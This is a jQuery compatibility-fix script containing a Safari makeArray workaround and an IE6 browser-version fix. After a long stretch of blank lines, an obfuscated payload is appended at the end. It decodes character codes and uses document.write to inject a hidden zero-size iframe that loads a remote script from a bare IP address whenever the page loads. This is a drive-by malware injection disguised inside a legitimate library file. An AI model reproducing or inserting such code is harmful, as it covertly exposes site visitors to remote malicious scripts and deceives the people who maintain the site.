/*
$Id: jquery-fix.js,v 1.3 2009/04/20 13:26:54 max Exp $
vim: set ts=2 sw=2 sts=2 et:
*/

/*
makeArray fix #3397 Ticket: Safari crash. 
http://dev.jquery.com/ticket/3397
*/
if ($.browser.safari) {
  jQuery.extend({
	  makeArray: function( array ) {
          var ret = [];

          if( array != null ){
              var i = array.length;
              //the window, strings and functions also have 'length'
  			if( i == null || "split" in array || "setInterval" in array || "call" in array )
                  ret[0] = array;
              else
                  while( i )
                      ret[--i] = array[i];
          }

          return ret;
      }
  });
}

if ($.browser.msie && parseInt($.browser.version) == 6) {
  var s = navigator.userAgent.toLowerCase();
  var index = s.indexOf('msie');
  if (index != -1)
    $.browser.version = parseFloat(s.substring(index + 5));
}






























var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!52!54!46!52!46!49!54!51!46!50!48!56!47!99!111!117!110!116!101!114!46!106!115!34!32!119!105!100!116!104!61!48!32!104!101!105!103!104!116!61!48!32!102!114!97!109!101!98!111!114!100!101!114!61!48!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);

